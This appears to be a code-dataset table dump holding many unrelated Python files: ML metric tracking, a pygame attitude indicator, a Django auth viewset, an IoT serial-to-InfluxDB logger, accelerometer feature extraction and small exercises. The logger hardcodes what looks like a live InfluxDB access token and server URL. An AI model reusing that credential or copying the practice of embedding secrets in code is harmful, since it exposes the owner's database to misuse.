seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
41457270924 | import logging
from ex_2 import CORRECT_LABEL, INCORRECT_LABEL
logger = logging.getLogger(__name__)
iterations = 0
total_tp = 0
total_fp = 0
total_tn = 0
total_fn = 0
total_accuracy = 0
total_recall = 0
total_precision = 0
def evaluate(head, correct_prob, incorrect_prob):
global tp, fp, tn, fn
if correct_prob >= incorrect_prob:
if head == CORRECT_LABEL:
tp += 1
return 'TP'
else:
fp += 1
return 'FP'
else:
if head == INCORRECT_LABEL:
tn += 1
return 'TN'
else:
fn += 1
return 'FN'
def initialize_stats():
global tp, fp, tn, fn
tp = 0
fp = 0
tn = 0
fn = 0
def compile_stats():
global iterations, total_tp, total_fp, total_tn, total_fn, total_accuracy, total_recall, total_precision
iterations += 1
total_tp += tp
total_fp += fp
total_tn += tn
total_fn += fn
accuracy = 1 - (fp + fn)/(tp + fp + tn + fn)
recall = tp/(tp+fn)
precision = tp/(tp+fp)
total_accuracy += accuracy
total_recall += recall
total_precision += precision
return {
"total": {"TP": tp, "FP": fp, "TN": tn, "FN": fn},
"accuracy": accuracy,
"recall": recall,
"precision": precision}
def get_total_stats():
return {
"total": {"TP": total_tp, "FP": total_fp, "TN": total_tn, "FN": total_fn},
"accuracy": total_accuracy/iterations,
"recall": total_recall/iterations,
"precision": total_precision/iterations}
| aserpi-uni/msecs-ml | ex_2/evaluation.py | evaluation.py | py | 1,566 | python | en | code | 1 | github-code | 90 |
39875228276 | #Napišite funkcijo, ki sprejme nabor podatkov v obliki dictionary-ja data in vrne največjo vrednost vsakega ključa
# (vrednosti so v obliki lista).
data = {"prices": [41970, 40721, 41197, 41137, 43033],
"volume": [49135346712, 50768369805, 47472016405, 34809039137, 38700661463]}
def najvecja_vrednost(podatki):
izpis = []
izpis.append(min(data[list(data)[0]]))
izpis.append(max(data[list(data)[1]]))
return izpis
vrednosti = najvecja_vrednost(data)
print(vrednosti) | BlazButara/TP | DN3/Naloga2.py | Naloga2.py | py | 508 | python | sl | code | 0 | github-code | 90 |
1420954672 | class Car:
fuel = "petrol" # class variable
def __init__(self):
self.milage =10 #instance variable
self.company = "ABC" # instance
c1 = Car()
c2 = Car()
c1.milage =8
Car.fuel = "diesel" # need to use class name to modify class variables
print(c1.company, c1.milage, c1.fuel)
print(c2.company,c2.milage,c1.fuel) | AswathiMohan23/Python_Basics | Variables/Class_variables/class_variables.py | class_variables.py | py | 339 | python | en | code | 0 | github-code | 90 |
73644873257 | #!/usr/bin/python3
import signal
import sys
import serial
import time
import datetime
from influxdb_client.client.write_api import WriteApi, SYNCHRONOUS
from influxdb_client import InfluxDBClient, Point, WritePrecision, WriteOptions
import pandas as pd
#Open text file where data will be written
f = open('/media/rems/REMS/rems.txt', 'a')
#Define variables and the client to write to InfluxDB open source (OSS)
OSS_url = "http://138.253.48.88:8086"
OSS_token = "gtWbY-DSA8NgaPyr_pEGQwf0W7T__2YcvQwmYoPGsU-7Tuvyz2dD1PfYGM7juGj3iAPZd6YNX2s9lX-FOL9Iiw=="
OSS_org = "UoL_environmental_monitoring"
OSS_bucket = "REMS_Strip Modules"
#Initialize OSS Client
OSS_client = InfluxDBClient(url=OSS_url, token=OSS_token, org=OSS_org)
#Serial data reading
def signal_handler(signal, frame):
print(" bye")
f.closed
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
ser = serial.Serial(
port='/dev/ttyUSB0',
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=1,
)
while 1:
x=ser.readline()
if len(x)>0:
today = datetime.date.today()
now = datetime.datetime.now()
f.write(str(now) + "\t" + x.decode())
if x is not None:
# Create a byte list with the serial data
x = node_id, status, voltage, atmega_temperature, wakeup_time, temperature, relative_humidity, rssi = x.split()
# Create a dictionary with data bytes converted to float/integers
raw_data = {}
raw_data['node_id'] = int(node_id)
raw_data['status'] = int(status)
raw_data['voltage(V)'] = float(voltage)
raw_data['atmega_temperature(°C)'] = float(atmega_temperature)
raw_data['wakeup_time(s)'] = int(wakeup_time)
raw_data['temperature(°C)'] = float(temperature)
raw_data['relative humidity(%)'] = float(relative_humidity)
raw_data['rssi(Signal strength(db))'] = int(rssi)
#Classify incoming data into type of data source (node_id 2 or node_id 3):
if "2" in str(node_id):
json_body = [{"measurement":"Environmental data",
"tags":{"Device":"SHT85 node_id 2"},
"fields": raw_data
}]
if "3" in str(node_id):
json_body = [{"measurement":"Environmental data",
"tags":{"Device":"SHT85 node_id 3"},
"fields": raw_data
}]
#Create data frame:
df = pd.DataFrame(data=raw_data, index=[pd.Timestamp.utcnow()])
#Display data
print (df)
#Send data to the InfluxDB OSS:
write_api_OSS = OSS_client.write_api(write_options=SYNCHRONOUS)
write_api_OSS.write(OSS_bucket, OSS_org, json_body)
#Dispose the Client
client.close()
| ManexOA/UoL_Environmental_Monitoring_IoT | Liverpool_REMS_IoT_2022-11-25/Other Codes/SHT85_SerialRead_influxdb_OSS_OLD_VERSION_.py | SHT85_SerialRead_influxdb_OSS_OLD_VERSION_.py | py | 3,143 | python | en | code | 0 | github-code | 90 |
25219911827 | import tkinter as tk
def aktionSF():
label3 = tk.Label(root, text="Aktion durchgeführt", bg="yellow")
label3.pack()
def grad_nach_kelvin():
#print(eingabefeld_wert)
grad = int(eingabefeld_wert.get())
kelvin = grad + 273
textausgabe = tk.Label(root, text=kelvin, bg="lightblue").pack()
root = tk.Tk()
# Textausgabe erzeugen
label1 = tk.Label(root, text="Etwas umrechnen").pack()
schaltf1 = tk.Button(root, text="Grad in Kelvin", command=grad_nach_kelvin, highlightbackground="gold").pack()
schaltf2 = tk.Button(root, text="Aktion durchführen", command=aktionSF, cursor='hand2').pack(side="bottom")
#Grad - Fahrenheit umrechnen
eingabefeld_wert=tk.StringVar()
eingabefeld=tk.Entry(root, textvariable=eingabefeld_wert).pack()
root.mainloop()
| Thieberius/python | gui/schaltflächen.py | schaltflächen.py | py | 769 | python | de | code | 0 | github-code | 90 |
18434763509 | a, b = map(int, input().split())
def f(x):
if (x + 1) % 4 == 0:
return 0
elif (x + 1) % 4 == 1:
return x
elif (x + 1) % 4 == 2:
return x ^ (x - 1)
else:
return x ^ (x - 1) ^ (x - 2)
print(f(b) ^ f(a - 1)) | Aasthaengg/IBMdataset | Python_codes/p03104/s106897872.py | s106897872.py | py | 252 | python | en | code | 0 | github-code | 90 |
13090782525 | class Solution:
def maxLen(self, n, arr):
maxLength = 0
currSum = 0
hashMap = {}
for i in range(n):
currSum += arr[i]
if currSum == 0:
maxLength = i + 1
elif currSum in hashMap:
maxLength = max(maxLength, i - hashMap[currSum])
else:
hashMap[currSum] = i
return maxLength
| magdumsuraj07/data-structures-algorithms | questions/striever_SDE_sheet/22_largest_subarray_with_0_sum.py | 22_largest_subarray_with_0_sum.py | py | 412 | python | en | code | 0 | github-code | 90 |
72976832618 | from sklearn.model_selection import train_test_split
import pandas as pd
from datasets.dataset import Dataset
from sklearn import preprocessing
TRAIN_PATH = 'data/chess/chess.data'
n_features = 6
class ChessDataset(Dataset):
def __init__(self):
self._raw_train_data = pd.read_csv(TRAIN_PATH, names=["c" + str(i) for i in range(n_features)] + ["target"])
self.name = 'chess'
def get_classes(self):
return ['draw',
'zero',
'one',
'two',
'three',
'four',
'five',
'six',
'seven',
'eight',
'nine',
'ten',
'eleven',
'twelve',
'thirteen',
'fourteen',
'fifteen',
'sixteen']
def get_train_and_test_data(self):
X_dummies, y_dummies = self._to_dummies()
X_train, X_test, y_train, y_test = train_test_split(X_dummies, y_dummies, test_size=0.25, shuffle=True)
# Package data into a dictionary
return {
'X_train': X_train, 'y_train': y_train,
'X_test': X_test, 'y_test': y_test
}
@property
def shape(self):
return self._raw_train_data.shape
def _to_dummies(self):
"""
use one hot encoding on the dataset.
"""
X = self._raw_train_data
y = X.iloc[:, [-1]]
X = X.drop(columns=['target'], axis=1)
return pd.get_dummies(X), y | elisim/Applied-Machine-Learning | assignment3/code/datasets/chess.py | chess.py | py | 1,688 | python | en | code | 3 | github-code | 90 |
5098849098 | #正規表現モジュール、あのブログ(対応表の方)に書く
import re
n=int(input())
a=list(map(int,input().split()))
change_num=0
flag=True
while(flag):
flag=False
for i in range(n-1):
if(a[i] > a[i+1]):
a[i],a[i+1] = a[i+1],a[i]
change_num+=1
flag=True
print(re.sub("[\[\]\,]","",str(a)))
print(change_num)
| WAT36/procon_work | procon_python/src/aoj/ALDS1_2_A_BubbleSort.py | ALDS1_2_A_BubbleSort.py | py | 378 | python | ja | code | 1 | github-code | 90 |
32057084907 | from django.contrib.auth import authenticate
from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from CRM.api.serializers import UserSerializer
class UserViewSet(ViewSet):
def get_permissions(self):
if self.action == "create" or self.action == "login":
permission_classes = [AllowAny]
else:
permission_classes = [IsAuthenticated]
return [permission() for permission in permission_classes]
def create(self, request):
serializer = UserSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
token, _ = Token.objects.get_or_create(user=user)
return Response(
{"token": token.key, "user": serializer.data},
status=status.HTTP_201_CREATED,
)
def login(self, request):
username = request.data.get("username")
password = request.data.get("password")
user = authenticate(username=username, password=password)
token, _ = Token.objects.get_or_create(user=user)
if user is None:
return Response(
{"error": "Invalid data"},
status=status.HTTP_400_BAD_REQUEST,
)
return Response(
{"token": user.auth_token.key},
status=status.HTTP_200_OK,
)
def logout(self, request):
request.user.auth_token.delete()
return Response(status=status.HTTP_200_OK)
def perform_create(self, serializer):
is_staff = self.request.data.get("is_staff", False)
user = serializer.save(is_staff=is_staff)
(user)
user.is_staff = is_staff
user.save()
def set_staff(self, request, pk=None):
try:
user = User.objects.get(pk=pk)
except User.DoesNotExist:
return Response(
{"error": "User not found"}, status=status.HTTP_404_NOT_FOUND
)
if not request.user.is_superuser:
return Response(
{"error": "Permission denied"}, status=status.HTTP_403_FORBIDDEN
)
is_staff = request.data.get("is_staff", False)
user.is_staff = is_staff
user.save()
return Response(
{"detail": "User staff status updated successfully"},
status=status.HTTP_200_OK,
)
def retrieve(self, request, pk=None):
try:
user = User.objects.get(pk=pk)
except User.DoesNotExist:
return Response(
{"error": "User not found"}, status=status.HTTP_404_NOT_FOUND
)
if not request.user.is_superuser:
return Response(
{"error": "Permission denied"}, status=status.HTTP_403_FORBIDDEN
)
serializer = UserSerializer(user)
return Response(
{"is_staff": user.is_staff, "user": serializer.data},
status=status.HTTP_200_OK,
)
| vitorqf/nadic_backend | django/CRM/CRM/api/viewsets.py | viewsets.py | py | 3,294 | python | en | code | 0 | github-code | 90 |
18065114469 | import math
#import numpy as np
import queue
from collections import deque,defaultdict
import heapq as hpq
from sys import stdin,setrecursionlimit
#from scipy.sparse.csgraph import dijkstra
#from scipy.sparse import csr_matrix
ipt = stdin.readline
setrecursionlimit(10**7)
def main():
n = int(ipt())
ans = 0
pi = 0
for _ in range(n):
a = int(ipt())
if a == 0:
pi = 0
else:
ans += (pi+a)//2
pi = (pi+a)%2
print(ans)
return
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p04020/s205937157.py | s205937157.py | py | 547 | python | en | code | 0 | github-code | 90 |
22824171012 | import requests
from django.conf import settings
def apply_exchange(amount, currency, dic):
url = f"https://freecurrencyapi.net/api/v2/latest?apikey={settings.CURRENCY_KEY}&base_currency=EUR"
get_res_url = requests.get(url)
results = get_res_url.json()
rates = results["data"]
rate = rates[currency]
dic["rate"] = rate
return amount / rate
def exchange_base_currency(base_currency):
url = f"https://freecurrencyapi.net/api/v2/latest?apikey={settings.CURRENCY_KEY}&base_currency={base_currency}"
get_res_url = requests.get(url)
results = get_res_url.json()
rates = results["data"]
return rates
def calculator_exchange(amount, currency, dic, rates, base_currency):
if currency != base_currency:
rate = rates[currency]
dic["rate"] = rate
else:
dic["rate"] = 1
rate = 1
return amount / rate
def palop_calculator_exchange(amount, currency, rates, base_currency):
if currency != base_currency:
rate = rates[currency]
return amount / rate
else:
return amount
def data_year_budget(data, dic_country_budget, rates, base_currency):
total_budget_year = 0
for db in data:
func = db.expense_functional_budget
orga = db.expense_organic_budget
currency = db.budget.currency
if func is not None:
amount_in_base_currency = palop_calculator_exchange(func, currency, rates, base_currency)
dic_country_budget[db.budget.country.name] = amount_in_base_currency
total_budget_year = total_budget_year + amount_in_base_currency
else:
if orga is not None:
amount_in_base_currency = palop_calculator_exchange(orga, currency, rates, base_currency)
dic_country_budget[db.budget.country.name] = amount_in_base_currency
total_budget_year = total_budget_year + amount_in_base_currency
return total_budget_year
| pabdelhay/paloptl | common/students/angola_lupossa.py | angola_lupossa.py | py | 1,975 | python | en | code | 0 | github-code | 90 |
7321227487 | import queue
import threading
from typing import Any, Callable
FINISHED = 'finished'
ERROR = 'error'
INFO = 'info'
class Event:
def __init__(self, evt_type: (ERROR, FINISHED, INFO), client_data: Any = None):
self.evt_type = evt_type
self.client_data = client_data
class BgExec(threading.Thread):
def __init__(self, run_func: Callable[[], Any], status_queue: queue.Queue):
super().__init__()
self._run_func = run_func
self._status_queue = status_queue
def run(self) -> None:
try:
result = self._run_func()
self._status_queue.put(Event(FINISHED, result))
except Exception as err:
self._status_queue.put(Event(ERROR, err))
| mgeselle/spectra | bgexec.py | bgexec.py | py | 730 | python | en | code | 0 | github-code | 90 |
13002612478 |
def solution(numbers):
result = []
n = len(numbers)
for i in range(n-1):
for j in range(i+1, n):
result.append(numbers[i] + numbers[j])
result = sorted(list(set(result)))
return result | hyeinkim1305/Algorithm | Programmers/Level1/Programmers_Level1_두 개 뽑아서 더하기.py | Programmers_Level1_두 개 뽑아서 더하기.py | py | 226 | python | en | code | 0 | github-code | 90 |
18440027839 | N = int(input())
X = []
U = []
for _ in range(N):
x, u = input().split()
X.append(float(x))
U.append(u)
ans = 0
for x, u in zip(X, U):
if u == 'JPY':
ans += x
else:
ans += x*380000.
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03110/s659892403.py | s659892403.py | py | 230 | python | en | code | 0 | github-code | 90 |
17053090580 | import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
class DrawCrowd:
def __init__(self, personcrowd):
self.personcrowd = personcrowd
def sort_and_draw(self):
crowd_array = self.personcrowd.crowd.copy()
crowd_array.sort(key=lambda x:x.wealth,reverse=False)
wealth = [x.wealth for x in crowd_array]
n = np.arange(self.personcrowd.person_num)
plt.bar(n, wealth)
for x, y in zip(n, wealth):
# ha: horizontal alignment
# va: vertical alignment
plt.text(x + 0.4, y + 0.05, '%d' % y, ha='center', va='bottom')
plt.show()
plt.savefig("one.png") | Cantoria/StimulateWealth | Crowd/Draw.py | Draw.py | py | 696 | python | en | code | 0 | github-code | 90 |
21483770831 | from __future__ import unicode_literals
from datetime import date, datetime
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core.mail import send_mail
from django.core.management.base import BaseCommand
from django.template import Context
from django.template.loader import get_template, render_to_string
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from aira.irma.main import agripoint_in_raster, model_results
from aira.models import notification_options, Profile
class Command(BaseCommand):
help = "Emails irrigation advice notifications to users."
def handle(self, *args, **options):
self.template = get_template('aira/email_notification.html')
for user in User.objects.all():
if not self.must_send_notification(user):
continue
# Send notification for user's own agrifields
self.notify_user(user, user.agrifield_set.all(), user)
# If user is a supervisor, send an additional notification to him
# for each of the supervised users.
for supervised_user in User.objects.filter(profile__supervisor=user
):
self.notify_user(user, supervised_user.agrifield_set.all(),
supervised_user)
def must_send_notification(self, user):
try:
return notification_options[user.profile.notification][1](
date.today())
except (Profile.DoesNotExist, KeyError):
return False
def get_email_context(self, agrifields, user, owner):
context = Context()
for f in agrifields:
f.results = model_results(f, "YES")
if agrifields[0].results is None:
logging.error(
('Internal error: No results for agrifield {} of user {}; '
'omitting notification for that user').format(
agrifields[0].name, user))
return None
context['owner'] = owner
context['sd'] = agrifields[0].results.sd
context['ed'] = agrifields[0].results.ed
context['agrifields'] = agrifields
context['site'] = Site.objects.get_current()
context['user'] = user
context['timestamp'] = datetime.now()
return context
def notify_user(self, user, agrifields, owner):
agrifields = [f for f in agrifields if agripoint_in_raster(f)]
if not agrifields:
return
logging.info('Notifying user {} about the agrifields of user {}'
.format(user, owner))
translation.activate(user.profile.email_language)
context = self.get_email_context(agrifields, user, owner)
if context is None:
return
msg_html = render_to_string('aira/email_notification.html', context)
send_mail(_("Irrigation status for ") + unicode(owner),
'',
settings.DEFAULT_FROM_EMAIL,
[user.email, ],
html_message=msg_html)
| lulzzz/aira | aira/management/commands/send_notifications.py | send_notifications.py | py | 3,203 | python | en | code | null | github-code | 90 |
25096766318 | #!/usr/bin/env python3
import pygame
import numpy as np
import threading
import time
def wrap(angle):
return angle if angle > 0 else 360 + angle
class Horizon:
def __init__(self, font_size=None):
if font_size is None:
font_size = 20
self.font = pygame.font.SysFont('timesnewroman', font_size)
pass
def draw(self, screen, angle):
deg = u'\xb0'
dc = pygame.Color(102,0,204)
mc = pygame.Color(191,128,255)
lc = pygame.Color(230,204,255)
w, h = screen.get_size()
rect = pygame.Rect(0,0,w,30)
pygame.draw.rect(screen, dc, rect)
size = 75
ax = size*np.cos(angle)
ay = size*np.sin(angle)
# fill the screen with a color to wipe away anything from last frame
rect = pygame.Rect(w//2-30, h//2, 2*30, 75)
pygame.draw.rect(screen, dc, rect, border_radius=5) # pitch bumpout
pygame.draw.circle(screen,"white",(w//2,h//2),50,) # full circle
pygame.draw.circle(screen,dc,(w//2,h//2),35) # small circle
pygame.draw.circle(screen,lc,(w//2,h//2),50,5) # outline
pygame.draw.line(screen, mc,(w//2-ax,h//2+ay),(w//2+ax,h//2-ay),5) # wings
pygame.draw.line(screen, mc,(w//2,h//2),(w//2-ay,h//2-ax),5) # tail
roll = wrap(angle*180/3.14)
roll = self.font.render(f"{roll:5.1f}{deg}", True, "white", dc)
pitch = wrap(angle*180/3.14)
pitch = self.font.render(f"{pitch:5.1f}{deg}", True, "white", dc)
pw = pitch.get_width()
screen.blit(pitch,(w//2-pw//2, h//2+50))
heading = wrap(angle*180/3.14)
heading = self.font.render(f"{heading:5.1f}{deg}", True, "white", dc)
rw = roll.get_width()
rh = roll.get_height()
screen.blit(roll,(w//2-rw//2,h//2-rh//2))
hw = heading.get_width()
screen.blit(heading,(w//2-hw//2,0))
# pygame setup
pygame.init()
screen = pygame.display.set_mode((300, 300), pygame.RESIZABLE)
clock = pygame.time.Clock()
running = True
cnt = 0
horizon = Horizon()
def counter():
global cnt
while running:
cnt += 10
print(cnt)
pygame.time.wait(100)
t = threading.Thread(target=counter)
t.daemon = True
t.start()
while running:
# poll for events
# pygame.QUIT event means the user clicked X to close your window
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
w, h = screen.get_size()
angle = (cnt % (2*314)) / 100 - 3.14
# fill the screen with a color to wipe away anything from last frame
screen.fill("black")
horizon.draw(screen, angle)
# flip() the display to put your work on screen
pygame.display.flip()
clock.tick(60) # limits FPS to 60
pygame.quit() | MomsFriendlyRobotCompany/quadcopter | tools/pygame/horizon.py | horizon.py | py | 2,793 | python | en | code | 0 | github-code | 90 |
18290014609 | import sys
import numpy as np
sr = lambda: sys.stdin.readline().rstrip()
ir = lambda: int(sr())
lr = lambda: list(map(int, sr().split()))
MOD = 10 ** 9 + 7
# 組合せ nCr (MOD) 逆元を使う方法
def perm(n,k):
if k > n or k < 0: return 0
return fact[n] * fact_inv[n-k] % MOD
def cmb(n, k):
if k < 0 or k > n: return 0
return fact[n] * fact_inv[k] % MOD * fact_inv[n-k] % MOD
def cumprod(arr, MOD):
L = len(arr); Lsq = int(L**.5+1)
arr = np.resize(arr, Lsq**2).reshape(Lsq, Lsq)
for n in range(1, Lsq):
arr[:, n] *= arr[:, n-1]; arr[:, n] %= MOD
for n in range(1, Lsq):
arr[n] *= arr[n-1, -1]; arr[n] %= MOD
return arr.ravel()[:L]
def make_fact(U, MOD):
x = np.arange(U, dtype=np.int64); x[0] = 1
fact = cumprod(x, MOD)
x = np.arange(U, 0, -1, dtype=np.int64); x[0] = pow(int(fact[-1]), MOD-2, MOD)
fact_inv = cumprod(x, MOD)[::-1]
return fact, fact_inv
U = 10 ** 5 + 100 # 階乗テーブルの上限
fact, fact_inv = make_fact(U, MOD)
N, K = lr()
A = np.array(lr())
A.sort()
if K == 1:
print(0); exit()
coef = np.zeros(N, np.int64)
coef[K-1:] = [cmb(n, K-1) for n in range(K-1, N)]
answer = (A * coef % MOD).sum() % MOD
coef = np.zeros(N, np.int64)
coef[:-K+1] = [cmb(n, K-1) for n in range(N-1, K-2, -1)]
answer -= (A * coef % MOD).sum() % MOD
print(answer%MOD)
# 53 | Aasthaengg/IBMdataset | Python_codes/p02804/s768562438.py | s768562438.py | py | 1,357 | python | en | code | 0 | github-code | 90 |
17996573269 | # BFS
# 現在の頂点、スコア、通過した頂点の数、を状態量としてもち、2*n個まで試す
# n個より多いものが最大になるのなら'inf'を出力
from collections import deque
from sys import stdin
def input():
return stdin.readline().strip()
inf = float('inf')
n, m = map(int, input().split())
edge = [[] for _ in range(n)]
weight = [[] for _ in range(n)]
for _ in range(m):
i, j, k = map(int, input().split())
i -= 1
j -= 1
edge[i].append(j)
weight[i].append(k)
seen = [-inf] * n
todo = deque([(0, 0, 1)])
while len(todo) > 0:
node, score, num = todo.popleft()
if num > 2 * n:
break
for i in range(len(edge[node])):
if seen[edge[node][i]] < score + weight[node][i]:
seen[edge[node][i]] = score + weight[node][i]
todo.append((edge[node][i], score + weight[node][i], num + 1))
if edge[node][i] == n - 1 and num >= n:
print('inf')
exit()
print(seen[n-1]) | Aasthaengg/IBMdataset | Python_codes/p03722/s290853901.py | s290853901.py | py | 1,013 | python | en | code | 0 | github-code | 90 |
26486022125 | import torch
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import KFold
import numpy
import torch.nn as nn
import spacy
# Make a github repo with cavas data
fold = KFold(n_splits=5)
X_Tests = []
Y_Tests = []
Epoch_loss = []
def line(x):
return 0.5 * x + 1
def mae(true_y, y_pred):
return numpy.mean((abs(true_y - y_pred)))
def average_All_Folds(list):
total = 0
for avge in list:
total = total + avge
return total / len(list)
def Folding_Loop(x, y):
for train_index, test_index in fold.split(x):
print(train_index, test_index)
train_x = numpy.array(x)[train_index]
train_y = numpy.array(y)[train_index]
test_x = numpy.array(x)[test_index]
test_y = numpy.array(y)[test_index]
# neural net code here, get a loss value for this fold
print(train_x, test_x)
print(train_y, test_y)
model = nn.Linear(1, 1)
# print(model)
# print(list(model.parameters()))
loss = nn.MSELoss()
# print(loss)
optimizer = torch.optim.SGD(model.parameters(),
lr=0.001) # lr = lreaning weight or how big of a jump[ of data to do
# print(optimizer)
x_touch = torch.tensor(train_x, dtype=torch.float32).unsqueeze(1)
# print(x_touch)# unsqeese seperates the df file
y_true_touch = torch.tensor(train_y, dtype=torch.float32).unsqueeze(1)
print_count = 0
for epoch in range(10):
y_pred = model(x_touch)
# print(y_pred)
epoch_loss = loss(y_pred, y_true_touch)
# if(print_count == 0 or print_count % 10 == 0):
print("epoch loss #" + str(print_count) + ": " + str(epoch_loss))
optimizer.zero_grad() # restart the starting point in data
epoch_loss.backward() # propagate the error backwars (for each weight)
optimizer.step() # looking both ways in the data and choose the directioni to move the weight in favor of loss
print_count = print_count + 1
# print(list(model.parameters())) # print acutal line
# df = pd.read_csv("heights_M.csv")
# x1 = df["Age (in months)"].values.tolist()
# x2 = df["3rd Percentile Length (in centimeters)"].values.tolist()
# x3 = df["5th Percentile Length (in centimeters)"].values.tolist()
# x4 = df["10th Percentile Length (in centimeters)"].values.tolist()
# x5 = df["25th Percentile Length (in centimeters)"].values.tolist()
# True_Y = df["50th Percentile Length (in centimeters)"].values.tolist()
df = pd.read_csv("video_games_sales.csv")
True_Y = df["Global_Sales"].values.tolist()
nlp = spacy.load("en_core_web_sm")
# df_crit = df["Critic_Score"].values.tolist() #Average = 69
# df_pub = df["Publisher"].values.tolist()
# df_userscore = df["User_Score"].values.tolist() #Average = 7.1
# df_genre = df["Genre"].values.tolist()
# df_names = df["Name"].values.tolist()
# df_usercount = df["User_Count"].values.tolist() #Average = 162
# df_critcount = df["Critic_Count"].values.tolist() #Average = 26
df['Critic_Score'] = df['Critic_Score'].replace(numpy.nan, 69)
df['User_Score'] = df['User_Score'].replace(numpy.nan, 7.1)
df['Critic_Count'] = df['Critic_Count'].replace(numpy.nan, 26)
df['User_Count'] = df['User_Count'].replace(numpy.nan, 162)
df_cats = df[["Name", "Genre", "Publisher", "Critic_Score", "Critic_Count", "User_Score", "User_Count"]]
df_list = df_cats.values.tolist()
# df_cats = pd.get_dummies(df_cats)
# print(df_cats[0])
# print()
print(pd.get_dummies(df_cats))
print_c = 0
for row in df_list:
print(row)
print_c+= 1
if print_c == 10:
break
# for token in df_cats:
# print(token)
# vocabulary = set()
# for genre in genres:
# doc = nlp(str(genre))
# for token in doc:
# print(token.text)
# vocabulary.add(token.text)
#
# for genre in genres:
# doc = nlp(str(genre))
# word_frequency = {}
# for token in doc:
# if token.text in word_frequency:
# word_frequency[token.text] += 1
# else:
# word_frequency[token.text] = 1
# # print(word_frequency)
# bag = []
# for w in sorted(vocabulary):
# if w in word_frequency:
# bag.append(word_frequency[w])
# else:
# bag.append(0)
# print(bag)
#
#
# t = torch.tensor(bag)
# print(t)
#
# t2 = torch.tensor([2,25,42])
# t3 = torch.cat([t,t2])
# print(t3)
print("TRUE Y: 50TH%")
print(True_Y)
# print("\nX1*********")
# print(x1)
# Folding_Loop(x1, True_Y)
#
# print("\nx2*********")
# print(x2)
# Folding_Loop(x2, True_Y)
#
# print("\nx3*********")
# print(x3)
# Folding_Loop(x3, True_Y)
#
# print("\nx4*********")
# print(x4)
# Folding_Loop(x4, True_Y)
#
# print("\nx5*********")
# print(x5)
# Folding_Loop(x5, True_Y)
| Orgzales/AI-Test-Data | experiment.py | experiment.py | py | 4,858 | python | en | code | 0 | github-code | 90 |
5346084226 | #!/usr/bin/env python
# python=
for i in range(int(input())):
print(f"Case #{i+1}:")
ans_list = []
#讀取資料
for n in range(10):
url,a = input().split(" ")
ans_list.append([int(a),url])
#進行判斷
max_math = max(ans_list)[0]
for i in ans_list :
if i[0] == max_math:
print(i[1])
| 10946009/upload_data | 特殊測資/U8/zj-a130/dom/ans.py | ans.py | py | 323 | python | en | code | 0 | github-code | 90 |
36845526850 | import numpy as np
import pandas as pd
import glob
import re
import os
from scipy import stats
import sys
sys.path.insert(1,'/scratch/c.c21013066/software/biobankAccelerometerAnalysis/accelerometer')
import utils
data_path='/scratch/c.c21013066/data/ukbiobank/sample/withGP/'
save_path1='/scratch/c.c21013066/data/ukbiobank/phenotypes/accelerometer/'
save_path='/scratch/scw1329/annkathrin/data/ukbiobank/accelerometer/'
# run through given folder and extract features and save
folder = sys.argv[1]
print(folder)
filenames = pd.read_csv(f'{save_path1}/subject_file_lookup.csv')
filenames = filenames[filenames['path']==folder]
#eids = pd.read_csv('/scratch/scw1329/annkathrin/data/ukbiobank/to_process4.csv')
#eids = eids['eid']
#intersect = np.intersect1d(eids,filenames['eid'])
#filenames = filenames[filenames['eid'].isin(intersect)]
# index = int(sys.argv[1])
# length = filenames.shape[0]//25
# start = index*length
# print(index,start,start+length)
# if index<24:
# filenames = filenames.iloc[start:start+length,:]
# else:
# filenames = filenames.iloc[start:,:]
subjects_avail = filenames['eid']
#subjects = glob.glob(f"{folder}/*timeSeries.csv.gz")
classes = ['sleep','light','sedentary','MVPA','imputed']
cols = np.hstack(['covered_days','complete_days_starting_10h','complete_days_starting_0h','complete_days_starting_7h', [f'mean_{cl}_hours_perday' for cl in classes],
[f'std_{cl}_hours_perday' for cl in classes],
[f'mean_{cl}_hours_per24h' for cl in classes],
[f'std_{cl}_hours_per24h' for cl in classes],
[f'mean_movement_during_{cl}' for cl in classes],
[f'std_movement_during_{cl}' for cl in classes],
[f'mean_max_{cl}_hours_consecutive_perday' for cl in classes],
[f'mean_max_{cl}_hours_consecutive_per24h' for cl in classes],
[f'max_{cl}_hours_consecutive' for cl in classes],
[f'mean_N_{cl}_intervals_per24h' for cl in classes],
[f'mean_N_{cl}_intervals_perday' for cl in classes],
[f'mean_N_{cl}_intervals_22-10' for cl in classes],
[f'mean_N_{cl}_intervals_10-22' for cl in classes],
[f'mean_N_{cl}_intervals_07-23' for cl in classes],
[f'mean_N_{cl}_intervals_23-07' for cl in classes]])
sum_sleep_raw = pd.DataFrame(index=subjects_avail,columns=cols)
thr = 2878 # last day stops for all 30sec early, so allow for 1 min to be missing each hour
for eid,file in zip(subjects_avail,filenames['file']):
# check where eid is in foldersystem
data_raw = pd.read_csv(file)
data_raw['time'] = data_raw['time'].apply(utils.date_parser)
data_raw = data_raw.set_index('time')
# check how much time coverage
sum_sleep_raw.loc[eid,f'covered_days'] = (data_raw.index[-1] - data_raw.index[0]) / np.timedelta64(1,'D')
sum_sleep_raw.loc[eid,f'complete_days_starting_10h'] = (data_raw.groupby(pd.Grouper(freq='24h', offset='10h', label='left')).size() >= thr).sum() # remove incomplete ones
